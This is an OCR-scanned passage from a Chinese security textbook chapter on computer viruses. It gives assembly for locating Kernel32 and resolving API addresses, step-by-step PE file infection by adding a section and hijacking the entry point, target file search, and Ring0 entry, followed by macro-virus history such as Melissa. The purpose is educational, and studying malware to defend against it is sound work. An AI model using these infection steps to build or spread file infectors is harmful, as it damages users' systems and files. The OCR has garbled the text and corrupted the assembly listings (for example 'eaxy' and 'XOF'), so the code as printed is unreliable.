00801010 8B8300104000 mov eax, dword prt [ebx + 00401000] 
// 最 后 一 句 相 当 于 
//mov eax, [00801000] 
// 或 mov eax, dwVar 


2. 获取 API 函数 

Win32 PE 病毒 和 普通 Win32 PE 程序 一 样 需 要 调用 API 函数 ,但 是 普通 的 Win32 PE 
程序 中 有 一 个 引入 函数 表 ,该 函数 表 对 应 了 代码 段 中 所 用 到 的 API 函数 在 动态 链接 库 中 的 
真实 地 址 。 这 样 ,调用 API 函数 时 就 可 以 通过 该 引入 表 找 到 相应 API 函数 的 真正 执行 地 
址 。 但 是 ,对 于 Win32 PE 病毒 来 说 , 它 只 有 一 个 代码 段 ,并 不 存在 引入 表 。 既 然 如 此 ,病毒 
就 无 法 像 普通 程序 那样 直接 调用 相关 API 函数 ,而 应 该 先 找 出 这 些 API 函数 在 相应 动态 链 
接 库 中 的 地 址 。 

如 何 获取 API 函数 地 址 一 直 是 病毒 技术 的 一 个 非常 重要 的 话题 。 要 获得 API 函数 地 
址 ,首先 需要 获得 相应 的 动态 链接 库 的 基地 址 。 在 实际 编写 病毒 的 过 程 中 ,经 常用 到 的 动态 
链接 库 有 Kernel32. dll 和 user32. dll 等 。 具 体 需 要 搜索 哪个 链接 库 的 基地 址 ,就 要 看 病毒 
要 用 的 函数 在 哪个 库 中 了 。 不 失 一 般 性 ,以 获得 Kernel32 基地 址 为 例 ,介绍 几 种 方法 。 

(1) 利用 程序 的 返回 地 址 ,在 其 附近 搜索 Kernel32 的 基地 址 。 大 家 知道 , 当 系 统 打 开 
一 个 可 执行 文件 的 时 候 , 会 调用 Kernel32. dll 中 的 CreateProcess 函数 。 当 CreateProcess 
函数 在 完成 装载 工作 后 , 它 先 将 一 个 返回 地 址 压 人 到 堆栈 顶端 ,然后 转向 执行 刚才 装载 的 应 
用 程序 。 当 该 应 用 程序 结束 后 ,会 将 堆栈 顶端 数据 弹出 放 到 CE)IP 中 ,并且 继 续 执行 。 刚 才 
堆栈 顶端 保存 的 数据 是 什么 呢 ? 仔细 想 想 , 不 难 明白 ,这 个 数据 其 实 就 是 CreateProcess 画 
数 在 Kernel32. dll 中 的 返回 地 址 。 其 实 这 个 过 程 和 call 指令 调用 子 程 序 类 似 。 

可 以 看 出 ,这 个 返回 地 址 在 Kernel32. dll 模块 中 。 另 外 PE 文件 被 装 入 内 存 时 是 按 内 
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存 页 对 齐 的 ,只 要 从 返回 地 址 按照 页 对 齐 的 边界 一 页 一 页 地 往 低地 址 搜索 ,就 必然 可 以 找到 
Kernel32. dll 的 文件 头 地 址 , 即 Kernel32 的 基地 址 。 其 搜索 代码 如 下 。 


mov ecx,[esp] // 将 堆栈 顶端 的 数据 ( 即 程序 返回 Kernel32 的 地 址 ) 赋 给 ecx 
xor edx,edx // 清 零 
getK32Base: 
dec ecx // 逐 字 节 比较 验证 ,也 可 以 一 页 一 页 地 搜 
movedx, word ptr [ecx+ IMAGE DOS HEADER.e lfanew] // 就 是 ecx+3ch 
testedx, 0f000h //Dos Header 和 stub 不 可 能 太 大 ,不 超过 4096 字 节 
jnz getK32Base // 加 速 检验 
cmp ecx,dword ptr [ecx+ edx+ IMAGE NT _ HEADERS.OptionalHeader. ImageBase] 
jnz getKk32Base // 看 Image_Base 值 是 否 等 于 ecx( 模 块 起 始 值 ) 


mov [ebp + offset k32Base],ecx  // 如 果 是 ,就 认为 找到 Kernel32 的 Base 值 


也 可 以 采用 以 下 方法 。 


getKBase: 

mov edi, [esp + 04h] 

// 这 里 的 esp + 04h 是 不 定 的 ,主要 看 从 程序 第 一 条 指令 执行 到 这 里 有 和 多少 push 
// 操 作 , 如 果 设 为 N 个 push, 则 这 里 的 指令 就 是 Mov edi, [esp+N* 4h] 

and edi, 0FFFF0000h 


.While TRUE 
,ifDWORD ptr [edi] == IMAGE DOS_SIGNATURE // 判 断 是 否 为 MZ 
mov esi, edi 
add esi, DWORD ptr [esi + 03Ch] //esi 指向 PE 标志 
.if DWORD ptr [esi] == IMAGE_ NT_SIGNATURE // 是 否 有 了 BE 标志 
.break // 如 果 有 ,跳出 循环 
.endif 
.endif 
sub edi, 010000h // 分 配 粒度 是 10000h, dll 必然 加 载 在 xxxx0000h 处 
.if edi < MIN_KERNEL SEARCH BASE //MIN_KERNEL_SEARCH_BASE 等 于 70000000H 
mov edi, Obff70000h // 如 果 上 面 没有 找到 , 则 使 用 Windows 9x 的 kernel 地 址 
.break 
.endif 
.endw 
mov hKernel32, edi // 把 找到 的 Kerne132. dll 的 基地 址 保存 起 来 


(2) 对 相应 操作 系统 分 别 给 出 固定 的 Kernel32 模块 的 基地 址 。 对 于 不 同 的 Windows 
操作 系统 ,Kernel32 模块 的 地 址 是 固定 的 ,甚至 一 些 API 函数 的 大 概 位 置 都 是 固定 的 。 辟 
如 ,Windows 98 为 BFF70000,Windows 2000 为 77E80000,Windows XP 为 77E60000。 

在 得 到 了 Kernel32 的 模块 地 址 以 后 ,就 可 以 在 该 模块 中 搜索 所 需要 的 API 地 址 了 。 
对 于 给 定 的 API, 可 以 通过 直接 搜索 Kernel32. dll 导出 表 的 方法 来 获得 其 地 址 ,同样 也 可 以 
先 搜 索 出 GetProcAddress 和 LoadLibrary 两 个 API 函数 的 地 址 ,然后 利用 这 两 个 API 函 
数 得 到 所 需要 的 API 函数 地 址 。 在 已 知 API 函数 序列 号 或 函数 名 的 情况 下 ,如 何在 导出 表 
中 搜索 API 函数 地 址 的 过 程 请 读者 进一步 阅读 “PE 文件 结构 ”"。 具 体 代 码 如 下 。 
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GetApiA proc Base: DWORD, sApi :DWORD 
local ADDRofFun: DWORD 
pushad 
moOV edi, Base 
add edi, IMAGE DOS HEADER.e lfanew 
mov edi, [edi] // 现 在 edi = off PE _HEADER 
add edi, Base // 得 到 IMAGE_NT_HEADERS 的 偏 移 
mov ebx, edi 
mov edi, 
[edi + IMAGE_ NT_ HEADERS. OptionalHeader. DataDirectory. VirtualAddress] 
add edi, Base // 得 到 edi = IMAGE_EXPORT_DIRECTORY 人口 
mov eax, [edi + 1ch] //addressOfFunctions 的 地 址 
add eax Base 
mov ADDRofFun, eax 
//ecx = NumberOfNames 
mov ecx, [edi + 18h] 
mov edx, [edi + 24h] 
add edx, Base //edx = AddressOfNameOrdinals 
mov edi, [edi + 20h] 
add edi, Base //edi= AddressOfNames 
invokeK32_api_retrieve, Base, sApi 
mov ebx, ADDRofFun 
shl eax,2 // 要 乘 以 4 才 得 到 偏 移 
add eaxy ebx 
mov eax, [eax] 
add eax, Base // 加 上 Base 
mov [esp+ 7x 4],eax //eax 返回 API 地 址 
popad 
ret 
GetApiA endp 
K32_api_ retrieve proc Base:DWORD , sApi:DWORD 
push edx // 保 存 edx 
xor eax, eax // 此 时 esi= sApi 
Next_Api: //edi= AddressOfNames 
mov esi, sApi 
Xxor edx, edx 
dec edx 


Match_Api_name: 
mov 
inc 
cmp 
jz 


bl,byte ptr [esi] 
esi 

bl,0 

foundit 


edx 
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push eax 
mov eax, [edi + eaxx 4] //addressOfNames 的 指针 ,递增 
add eax, Base // 注 意 是 RVA, 一 定 要 加 Base 值 
cmp bl,byte ptr [eax+ edx] // 逐 字符 比较 
pop eax 
jz Match Api name // 继 续 搜 寻 
inc eax // 不 匹配 ,下 一 个 API 
loop Next_ Api 
jmp no_exist // 若 全 部 搜 完 , 即 未 存在 
foundit: 
pop edx //edx = AddressOfNameOrdinals 
shl eaxy 1 // 乘 以 2 得 到 AddressOfNameOrdinals 的 指针 
movZx eax,word ptr [edx+ eax];  //eax 返回 指 向 AddressOfFunctions 的 指针 
ret 
no_exist: 
pop edx 
XOF eaxy eax 
ret 
K32_api_retrieve endp 
3. 文件 搜索 


搜索 文件 是 病毒 寻找 目标 文件 的 非常 重要 的 功能 。 在 Win32 汇编 中 ,通常 采用 API 瑞 
数 进行 文件 搜索 。 关 键 的 函数 和 数据 结构 如 下 。 

(1) FindFirstFile: 该 函数 根据 文件 名 查找 文件 。 

(2) FindNextFile: 该 函数 根据 调用 FindFirstFile 函数 时 指定 的 一 个 文件 名 查找 下 一 
个 交 件 ; 

(3) FindClose: 该 函数 用 来 关闭 由 FindFirstFile 函数 创建 的 一 个 搜索 句柄 。 

(4) WIN32_FIND_DATA: 该 结构 中 存放 着 找到 文件 的 详细 信息 。 

文件 搜索 一 般 采 用 递归 算法 进行 搜索 ,也 可 以 采用 非 递归 搜索 方法 ,这 里 仅 介绍 递归 算 
法 的 搜索 过 程 。 

FindFile Proc 

(1) 指定 找到 的 目录 为 当前 工作 目录 

(2) 开始 搜索 文件 (* . x ) 

(3) 该 目录 搜索 完毕 ?是 则 返回 ,否则 继续 

(4) 找到 文件 还 是 目录 ?是 目录 则 调用 自身 函数 FindFile, 否则 继续 

(5) 是 文件 ,如 符合 感染 条 件 , 则 调用 感染 模块 ,否则 继续 


(6) 搜索 下 一 个 文件 (FindNextFile), 转 到 (3) 继 续 
FindFile Endp 


4. 内 存 映射 文件 
内 存 映射 文件 提供 了 一 组 独立 的 函数 ,这 些 函 数 使 应 用 程序 能 够 像 访 问 内 存 一 样 对 磁 
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盘 上 的 文件 进行 访问 。 这 组 内 存 映射 文件 函数 将 磁盘 上 的 文件 全 部 或 者 部 分 映射 到 进程 虚 
拟 地 址 空间 的 某 个 位 置 ,以 后 对 文件 内 容 的 访问 就 如 同 在 该 地 址 区 域内 直接 对 内 存 访问 
一 样 简单 。 这 样 ,对 文件 中 数据 的 操作 便 是 直接 对 内 存 进行 操作 ,大 大 提高 了 访问 的 速 
度 ,这 对 于 计算 机 病毒 减少 资源 占有 是 非常 重要 的 。 在 计算 机 病毒 中 ,通常 采用 如 下 几 
个 步骤 。 

(1) 调用 CreateFile 函数 打开 想 要 映射 的 宿主 程序 ,返回 文件 句柄 hFile。 

(2) 调用 CreateFileMapping 函数 生成 一 个 建立 基于 宿主 文件 句柄 hFile 的 内 存 映 射 对 
象 ,返回 内 存 映 射 对 象 句柄 hMap。 

(3) 调用 MapViewOfFile 函数 将 整个 文件 (一 般 还 要 加 上 病毒 体 的 大 小 ) 映 射 到 内 存 
中 。 得 到 指向 映射 到 内 存 的 第 一 个 字 节 的 指针 (pMem)。 

(4) 用 刚才 得 到 的 指针 pMem 对 整个 宿主 文件 进行 操作 ,对 宿主 程序 进行 病毒 感染 。 

(5) 调用 UnmapViewFile 函数 解除 文件 映射 ,传人 参数 是 pMem。 

(6) 调用 CloseHandle 函数 来 关闭 内 存 映射 文件 ,传人 参数 是 hMap。 

(7) 调用 CloseHandle 函数 来 关闭 宿主 文件 ,传人 参数 是 hFile。 

5. 病毒 如 何 感染 其 他 文件 

PE 病毒 感染 其 他 文件 的 常见 方法 是 在 文件 中 添加 一 个 新 的 节 , 然 后 把 病毒 代码 和 病 
毒 执行 后 返回 宿主 程序 的 代码 写 和 人 新 添加 的 节 中 ,同时 修改 PE 文件 头 中 和 口 点 
(AddressOfEntryPoint) ,使 其 指向 新 添加 的 病毒 代码 入 口 。 这 样 , 当 程序 运行 时 ,首先 执行 
病毒 代码 , 当 病 毒 代码 执行 完成 后 才 转 向 执行 宿主 程序 。 下 面具 体 分 析 病 毒 感染 其 他 文件 
的 步骤 。 

(1) 判断 目标 文件 开始 的 两 个 字 节 是 否 为 MZ。 

(2) 判断 PE 文件 标记 PE。 

(3) 判断 感染 标记 ,如 果 已 被 感染 过 则 跳出 ,继续 执行 宿主 程序 ,否则 继续 。 

(4) 获得 Data Directory( 数 据 目 录 ) 的 个 数 (每 个 数据 目录 信息 占 8 字 节 )。 

(5) 得 到 节 表 起 始 位 置 (数据 目录 的 偏 移 地 址 十 数据 目录 占用 的 字 节 数 一 节 表 起 始 
位 置 ) 。 

(6) 得 到 节 表 的 末尾 偏 移 ( 紧 接 其 后 用 于 写 和 一 个 新 的 病毒 节 信息 , 节 表 起 始 位 置 十 节 
的 个 数 X 每 个 节 表 占 用 的 字 节 数 28H 一 节 表 的 末尾 偏 移 ) 。 

(7) 开始 写 入 节 表 。 

@ 写 入 节 名 (8 字 节 ) 。 

@ 写 入 节 的 实际 字 节 数 (4 字 节 )。 

@ 写 入 新 节 在 内 存 中 的 开始 偏 移 地 址 (4 字 节 ), 同 时 可 以 计算 出 病毒 入 口 位 置 。 上 一 
个 节 在 内 存 中 的 开始 偏 移 地 址 十 (上 一 个 节 的 大 小 / 节 对 齐 十 1) 尖 节 对 齐 一 本 节 在 内 存 中 的 
开始 偏 移 地 址 。 

@ 写 人 本 节 ( 即 病毒 节 ) 在 文件 中 对 齐 后 的 大 小 。 

@@ 写 入 本 节 在 文件 中 的 开始 位 置 。 上 节 在 文件 中 的 开始 位 置 十 上 节 对 齐 后 的 大 小 = 
本 节 ( 即 病毒 ) 在 文件 中 的 开始 位 置 。 

@ 修改 映像 文件 头 中 的 节 表 数目 。 

@ 修改 AddressOfEntryPoint ( 即 程 序 入 口 点 指向 病毒 人口 位 置 ), 同 时 保存 旧 的 
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AddressOfEntryPoint, 以便 返回 宿主 并 继续 执行 。 

更 新 SizeOfImage( 内 存 中 整个 PE 映像 尺寸 = 原 SizeOfImage 十 病毒 节 经 过 内 存 节 
对 齐 后 的 大 小 ) 。 

@ 写 人 感染 标记 (后 面 例子 中 是 放 在 PE 头 中 ) 。 

(8) 在 新 添加 的 节 中 写 人 病毒 代码 。 

ECX = 病毒 长 度 


ESI = 病毒 代码 位 置 (并 不 一 定 等 于 病毒 执行 代码 开始 位 置 ) 
EDI = 病毒 节 写 人 位置 


(9) 将 当前 文件 位 置 设 为 文件 末尾 。 

6. 如 何 返 回 到 宿主 程序 

为 了 提高 自己 的 生存 能 力 ,病毒 不 应 该 破坏 宿主 程序 的 原 有 功能 。 因 此 ,病毒 应 该 在 执 
行 完 毕 后 ,立刻 将 控制 权 交 给 宿主 程序 。 病 毒 如 何 做 到 这 一 点 呢 ? 返回 宿主 程序 相对 来 
说 比较 简单 ,病毒 在 修改 被 感染 文件 代码 开始 执行 位 置 (AddressOfEntryPoint) 时 ,会 保存 
原来 的 值 ,这 样 ,病毒 在 执行 完 病 毒 代码 之 后 用 一 个 跳 转 语句 跳 到 这 段 代码 处 继续 执行 
即 可 。 

在 这 里 ,病毒 会 先 作 出 一 个 “现在 执行 程序 是 否 为 病毒 启动 程序 ”的 判断 ,如 果 不 是 启动 
程序 ,病毒 才 会 返回 宿主 程序 ,否则 继续 执行 程序 其 他 部 分 。 对 于 启动 程序 来 说 , 它 是 没有 
病毒 标志 的 。 

上 述 几 点 都 是 病毒 编制 不 可 缺少 的 技术 ,这 里 的 介绍 比较 简单 ,如 果 想 进一步 了 解 
病毒 编制 技术 可 以 参考 Billy Belceb 的 Win32 病毒 编制 技术 以 及 中 国 病毒 公社 (CVC) 


3.3.3 从 Ring3 到 Ring0 的 简 述 


Windows 操作 系统 运行 在 保护 模式 ,保护 模式 将 指令 执行 分 为 4 个 特权 级 , 即 众 所 周 
知 的 Ring0、Ringl、Ring2 和 Ring3。Ring0 意味 着 更 多 的 权利 ,可 以 直接 执行 诸如 访问 端 
口 等 操作 ,通常 应 用 程序 运行 于 Ring3 ,这 样 可 以 很 好 地 保护 系统 安全 。 然 而 当 需 要 Ring0 
的 时 候 (如 跟踪 、 反 跟踪 和 写 病 毒 等 ), 麻烦 就 来 了 。 如 果 想 进入 Ring0, 一 般 要 写 VxD 或 
WDM 驱动 程序 ,但 这 项 技术 对 一 般 人 来 说 并 不 那么 简单 。 由 于 Windows 9x 未 对 IDT 
(Interrupt Descriptor Table) .GDT(Global Descriptor Table) 和 LDT (Locale Descriptor 
Table) 加 以 保护 ,可 以 利用 这 一 漏洞 进入 Ring0。 用 SHE(Structure Handle Exception) 、 
IDT、GDT 和 LDT 等 方法 进入 Ring0 的 例子 请 参考 CVC 杂志 .已 公开 的 病毒 源码 和 相关 
论坛 等 。 

在 Windows NT/Windows 2000/Windows XP 下 进入 Ring0 是 一 件 较 困难 的 事情 , 因 
此 ,大 多 数 感 染 Windows NT/Windows 2000/Windows XP 系统 的 病毒 都 是 Ring3 级 别 的 。 

由 于 Windows 2000 有 比较 多 的 安全 审核 机 制 ,在 Windows 2000 下 进入 Ring0 还 必须 
具有 Administrator 权限 。 如 果 系 统 存在 某 种 漏洞 ,如 缓冲 区 溢出 等 ,还 是 有 可 能 获得 
Administrator 权限 的 。 因 此 ,必须 同时 具备 病毒 编制 技术 和 黑客 技术 才能 进入 Windows 
2000 的 Ring0, 由 此 可 以 看 出 ,病毒 编制 技术 越 来 越 需 要 综合 能 力 。 


第 3 章 传统 计算 机 病毒 73 


3.3.4 PE 文件 格式 实验 


本 实验 是 根据 PE 文件 结构 及 其 运行 原理 而 设计 的 实验 。 通 过 该 实验 ,读者 可 以 了 解 
PE 文件 的 结构 ,为 进一步 学 习 PE 文件 病毒 原理 奠定 基础 。 

【实验 目的 】 

了 解 PE 文件 的 基本 结构 。 

【实验 环境 】 

(1) Windows 2000、Windows 9x、Windows NT 以 及 Windows XP。 

(2) Visual Studio 6. 0。 

【实验 步骤 】 

文件 位 置 : 本 书 配 套 素材 目录 \Experiment\winpe。 

使 用 编译 环境 打开 源 代码 工程 ,编译 后 可 以 生成 可 执行 文件 winpe. exe。 

预备 步骤 : 找 任意 一 个 Win32 下 的 EXE 文件 作为 查看 对 象 。 

实验 内 容 : 运行 winpe. exe, 并 打开 任 一 exe 文件 ,选择 不 同 的 菜单 ,可 以 查看 到 exe 文 
件 的 内 部 结构 。 实 验 具体 步骤 可 以 参考 本 书 PPT。 可 以 与 网 上 同类 共享 软件 比较 ,例如 ， 
PE_STUB. exe 等 PE 文件 查看 器 软件 。 


3.4 宏 病 毒 


在 恶意 代码 出 现 的 早期 , 反 病 毒 研究 者 就 在 讨论 宏 病毒 了 。20 世纪 80 年 代 , 两 位 出 色 
的 研究 者 Fred Cohen 博士 和 Ralf Burger 对 此 进行 了 讨论 ,1989 年 Harold Highland 曾经 
对 此 写 过 一 篇 关于 安全 方面 的 文章 A Macro Virus 。 反 病毒 界 知道 了 实现 宏 病 毒 的 可 能 
性 ,并 且 为 它们 没有 在 Lotus 1-2-3 和 WordPerfect 中 出 现 而 感到 困惑 。 或 许 病毒 制造 者 正 
在 等 待 合适 的 程序 出 现 。 这 个 合适 的 程序 就 是 Microsoft Word。 第 一 个 微软 Office 宏 病 毒 
于 1994 年 12 月 发 布 。 到 1995 年 Office 宏 病 毒 就 已 经 感染 了 世界 上 几乎 所 有 的 Windows 
计算 机 。 曾 几何 时 , 宏 病毒 让 其 他 类 型 的 恶意 代码 都 黯然 失色 。 


3.4.1 宏 病 毒 的 运行 环境 


宏 病 毒 与 普通 病毒 不 同 , 它 不 感染 EXE 文件 和 COM 文件 ,也 不 需要 通过 引导 区 传播 ， 
而 只 感染 文档 文件 。 制 造 宏 病 毒 并 不 费事 , 宏 病 毒 作者 只 需要 懂得 一 种 宏 语 言 ,并 且 可 以 用 
它 来 操纵 自己 和 其 他 文件 ,保证 能 够 按照 预先 定义 好 的 事件 执行 即 可 。 宏 病毒 的 产生 ,是 利 
用 了 一 些 数据 处 理 系 统 ( 如 Microsoft Word 文字 处 理 `Microsoft Excel 表格 处 理 系统 ) 内 置 
宏 命令 编程 语言 的 特性 而 形成 的 。 要 达到 宏 病 毒 传染 的 目的 , 须 具 备 以 下 特性 。 

(1) 可 以 把 特定 的 宏 命令 代码 附加 在 指定 文件 上 。 

(2) 可 以 实现 宏 命令 在 不 同文 件 之 间 的 共享 和 传递 。 

(3) 可 以 在 未 经 使 用 者 许可 的 情况 下 获取 某 种 控制 权 。 

目前 ,符合 上 述 条 件 的 系统 有 很 多 ,其 中 包括 Microsoft 公司 的 Word、 Excel、 Access、 
PowerPoint、Project、Visio 等 产品 ,Inprise 公司 的 Lotus AmiPro 文字 处 理 软件 。 此 外 ,还 
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包括 AutoCAD CorelDRAW、PDF 等 。 这 些 系统 内 置 了 一 种 类 似 于 Basic 语言 的 宏 编 程 语 
言 ( 如 BASIC、Visual Basic 及 VBA 等 ) 。 

所 谓 宏 ,就 是 一 些 命令 组 织 在 一 起 ,作为 一 个 单独 单元 完成 一 个 特定 任务 。Microsoft 
Word 中 将 宏 定 义 为 :“ 宏 就 是 能 组 织 到 一 起 作为 独立 命令 使 用 的 一 系列 Word 命令 , 它 能 
使 日 常 工作 变 得 更 容易 。”Word 使 用 宏 语言 BASIC 将 宏 作为 一 系列 指令 来 编写 。 要 想 搞 
清楚 宏 病 毒 的 来 龙 去 脉 ,必须 了 解 Word 宏 的 基本 知识 及 其 编程 技术 。 

宏 语 言 是 一 种 编程 语言 ,但 是 有 其 自己 的 弱点 。 首 先 , 宏 语言 不 能 脱离 母 程序 运行 。 这 
就 导致 了 第 二 个 弱点 , 宏 语言 是 解释 型 的 ,而 不 是 编译 型 的 。 每 一 个 宏 命 令 要 在 其 运行 时 骸 
和 到 相应 的 位 置 , 这 种 解释 非常 耗费 时 间 。Office 新 的 宏 语 言 实 际 上 是 部 分 编译 成 中 间 代 
码 , 成 为 p 代码 。 但 是 p 代码 仍然 需要 解释 执行 。 

Word 宏 病 毒 是 一 些 制作 病毒 的 专业 人 员 利 用 Microsoft Word 的 开放 性 专门 制作 的 一 
个 或 多 个 具有 病毒 特点 的 宏 的 集合 ,这 种 病毒 宏 的 集合 影响 到 计算 机 的 使 用 ,并 能 通过 
DOC 文 档 及 DOT 模板 进行 自我 复制 及 传播 。 

尽管 宏 病 毒 可 以 在 任何 一 个 功能 丰富 的 宏 语 言 应 用 程序 下 创建 ,但 它 多 数 还 是 在 微软 
Office 程序 下 运行 的 。 根 据 InfoWorld 杂志 的 说 法 ,世界 上 有 超过 9000 万 的 微软 Office 用 
户 , 因 此 ,多 数 宏 病毒 是 为 Word 和 Excel 设计 的 。 


3.4.2 宏 病 毒 的 特点 


与 传统 的 病毒 不 同 , 宏 病毒 具有 自己 的 特别 之 处 ,概括 起 来 包括 如 下 几 种 。 

1. 传播 极 快 

Word 宏 病 毒 通过 DOC 文档 及 DOT 模板 进行 自我 复制 及 传播 ,而 DOC 文档 是 交流 最 
广 的 文件 类 型 。 多 年 来 ,人 们 大 多 重视 保护 自己 计算 机 的 引导 部 分 和 可 执行 文件 不 被 病毒 
感染 ,而 对 外 来 的 文档 文件 基本 是 直接 浏览 使 用 ,这 给 Word 宏 病 毒 传播 带 来 极 大 的 便利 。 
特别 是 Internet 网 络 的 普及 ,E-mail 的 大 量 应 用 更 为 Word 宏 病 毒 传播 铺 平 道路 。 

2. 制作 方便 ,变种 多 

Word 使 用 宏 语 言 BASIC 来 编写 宏 指 令 。 宏 病毒 同样 用 BASIC 来 编写 。 目 前 ,世界 上 
的 宏 病 毒 原型 已 有 几 十 种 ,其 变种 与 日 俱 增 ,追究 其 原因 还 是 Word 的 开放 性 所 致 。 现 在 的 
Word 病毒 都 是 用 BASIC 语言 写成 的 ,大 部 分 Word 病毒 宏 并 没有 使 用 Word 提供 的 
Execute Only 处 理 函 数 处 理 ,而 是 仍 处 于 可 打开 阅读 修改 状态 。 

所 有 用 户 能 够 很 方便 地 在 Word 工具 的 宏 菜单 中 看 到 这 种 宏 病毒 的 全 部 面目 。 当 然 会 
有 “不 法 之 徒 "利用 掌握 的 BASIC 语句 把 其 中 病毒 激活 条 件 和 破坏 条 件 加 以 改变 ,立即 就 生 
产 出 了 一 种 新 的 宏 病 毒 , 甚 至 比 原 病毒 的 危害 更 加 严重 。 

3. 破坏 可 能 性 极 大 

宏 病 毒 用 VBA( 早 期 使 用 BASIC) 语 言 编 写 , 而 VBA 或 BASIC 语言 提供 了 许多 系统 级 
底层 调用 。 如 直接 使 用 DOS 系统 命令 ,调用 Windows VBA 或 API, 以 及 DDE、DLL 等 。 
这 些 操 作 均 可 能 对 系统 直接 构成 威胁 ,而 Word 在 指令 安全 性 、 完 整 性 上 检测 能 力 很 弱 , 破 
坏 系统 的 指令 很 容易 被 执行 。Word 宏 病 毒 的 破坏 体现 在 两 方面 。 

(1) 对 Word 运行 的 破坏 。 不 能 正常 打印 .关闭 或 改变 文件 存储 路 径 、 将 文件 改名 、 乱 


第 3 章 传统 计算 机 病毒 75 


复制 文件 .封闭 有 关 菜 单 以 及 使 文件 无 法 正常 编辑 。 如 Taiwan No. 1 病毒 每 月 13 日 发 作 ， 
发 作 时 所 有 编写 工作 无 法 进行 。 

(2) 对 系统 的 破坏 。BASIC 语言 能 够 调用 系统 命令 ,造成 破坏 。 宏 病毒 Nuclear 就 是 
破坏 操作 系统 的 典型 之 一 。 

4. 多 平台 交叉 感染 

宏 病 毒 冲破 了 以 往 病毒 在 单一 平台 上 传播 的 局 限 , 当 Word 和 Excel 这 类 著名 应 用 软 
件 在 不 同 平台 (如 Windows 9x、Windows NT、OS/2 和 MAC 等 ) 上 运行 时 ,会 引起 宏 病 毒 
的 交叉 感染 。 

5. 地 域 性 问题 

早期 的 绝 大 多 数 宏 病 毒 只 感染 英文 版 Word 系统 ,通常 不 会 感染 其 他 一 些 本 地 化 的 非 
英文 版 本 的 Word 系统 ,如 法 文 版 或 德 文 版 Word 系统 。 当 然 相 反 的 情况 也 同样 存在 ,这 
是 因为 其 内 置 的 BASIC 是 不 同 版 本 的 缘故 。 由 于 中 文 版 Word 内 置 的 BASIC 实际 上 是 
英文 版 的 ,因此 ,所 有 感染 英文 版 Word 的 宏 病 毒 几乎 都 会 对 中 文 版 Word 产生 威胁 。 

6. 版 本 问题 

宏 病毒 在 DOC 文档 .DOT 模板 中 以 BFF(Binary File Format) 格 式 存放 ,这 是 一 种 加 
密 压 缩 格式 ,不同 的 Word 版 本 格式 可 能 不 兼容 。 


3.4.3 经 典 宏 病毒 


1. 美丽 莎 (Melissa) 

1999 年 3 月 26 日 ,星期 五 ,上 午 8 点 30 分 。 著 名 反 病 毒 公司 NAI 的 专家 所 风门 博士 
(Solomons) 在 一 个 著名 的 “性 讨论 新 闻 组 "里 发 现 了 一 个 极 不 寻常 的 帖子 ,并 在 其 文档 中 发 
现 了 编写 精致 的 宏 病毒 。 

这 个 病毒 专门 针对 微软 的 电子 邮件 服务 器 MS Exchange 和 电子 邮件 收发 软件 Outlook 
Express, 是 一 种 Word 宏 病 毒 ,利用 微软 的 Word 宏和 Outlook Express 发 送 载 有 80 个 色 
情 文 学 网 址 的 列表 , 它 可 感染 Word 97 或 Word 2000。 当 用 户 打开 一 个 受到 感染 的 Word 
97 或 Word 2000 文件 时 ,病毒 会 自动 通过 被 感染 者 的 MS Exchange 和 Outlook Express 的 
通讯 录 , 给 前 50 个 地 址 发 出 带 有 W97M_MELISSA 病毒 的 电子 邮件 。 

如 果 某 个 用 户 的 电子 信箱 感染 了 “美丽 莎 "病毒 ,那么 ,在 他 的 信箱 中 将 可 以 看 到 标题 为 
“Important message from XX( 来 自 六 XX 的 重要 信息 )” 的 邮件 ,其 中 XX 是 发 件 人 的 名 字 。 
正文 中 写 道 ,“ 这 是 你 所 要 的 文件 …… 不 要 给 其 他 人 看 .” 此 外 ,该 邮件 还 包括 一 个 名 为 list. doc 
的 Word 文档 附件 ,其 中 包含 大 量 的 色情 网 址 。 

由 于 每 个 用 户 的 邮件 目录 中 大 都 留 有 部 分 经 常 通信 的 朋友 或 客户 的 地 址 , “美丽 莎 " 病 
毒 便 能 够 以 几何 级 数 向 外 传播 ,直至 “淹没 "电子 邮件 服务 器 ,使 大 量 电 子 邮件 服务 器 瘫痪 。 
据 计 算 , 如 果 “ 美 丽 莎 " 能 够 按照 理论 上 的 速度 传播 ,只 需要 繁殖 5 次 就 可 以 让 全 世界 所 有 的 
网 络 用 户 都 收 到 一 份 病毒 邮件 。 由 于 病毒 自动 地 进行 自我 复制 ,因而 属于 蠕虫 类 病毒 。“ 美 
丽水 ”的 作者 显然 对 此 颇 为 得 意 ,他 在 病毒 代码 中 写 道 :“ 蠕 虫 类 ? 宏 病 毒 ? Word 97 病毒 ? 
还 是 Word 2000 病毒 ? 你 们 自己 看 着 办 吧 !” 

“美丽 莎 ?” 最 令 人 慌 怖 之 处 ,不 在 于 * 瘫 病 ? 邮 件 服务 器 ,而 是 大 量 涉 及 企业 .政府 和 军队 
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的 核心 机 密 有 可 能 通过 电子 邮件 的 反复 传递 而 扩散 出 去 ,甚至 受 损害 的 用 户 连 机 密 被 扩散 
到 了 哪里 都 不 知道 。 由 此 看 来 ,“ 美 丽 莎 " 较 1988 年 谈 之 色 变 的 “ 莫 里 斯 蠕虫 病毒 ”和 1998 
年 的 “BO 黑客 程序 ”更 加 险恶 。 

2. 台湾 NO.1B 

从 1995 年 发 现 了 全 世界 第 一 个 宏 病毒 后 ,1996 年 在 我 国 台湾 也 已 诞生 了 第 一 个 本 土 
中 文化 的 “十 三 号 台湾 NO. 1B 宏 病毒 "。 这 个 病毒 以 “何谓 宏 病 毒 ,如 何 预防 ?” 之 类 的 标 
题 , 随 着 Internet 与 BBS 网 络 流传 ,将 会 对 不 知情 而 打开 观看 的 Word 使 用 者 造成 很 大 的 不 
便 。 除 了 一 般 的 计算 机 经 销 商 在 13 日 当天 传 出 灾情 ,导致 Word 无 法 使 用 外 ,若干 学 校 也 
发 现 此 病毒 的 踪迹 。 在 不 是 13 日 的 日 子 里 , 宏 病 毒 只 会 默默 地 进行 感染 的 工作 。 而 一 旦 到 
了 每 月 13 日 ,只 要 用 户 随便 开启 一 份 文件 来 看 ,病毒 就 马上 发 作 。 

病毒 发 作 时 ,只 要 打开 一 个 Word 文档 ,就 会 被 要 求 计算 一 道 5 个 至 多 4 位 数 的 连 乘 算 
式 。 由 于 算式 的 复杂 度 , 很 难 在 短 时 间 内 计算 出 答案 ,一 旦 计算 错误 , Word 就 会 自动 开启 
20 个 新 窗口 ,然后 再 次 生成 一 道 类 似 的 算式 ,接着 不 断 往复 ,直至 系统 资源 耗 尽 。 

3. 097M. Tristate. C 病毒 

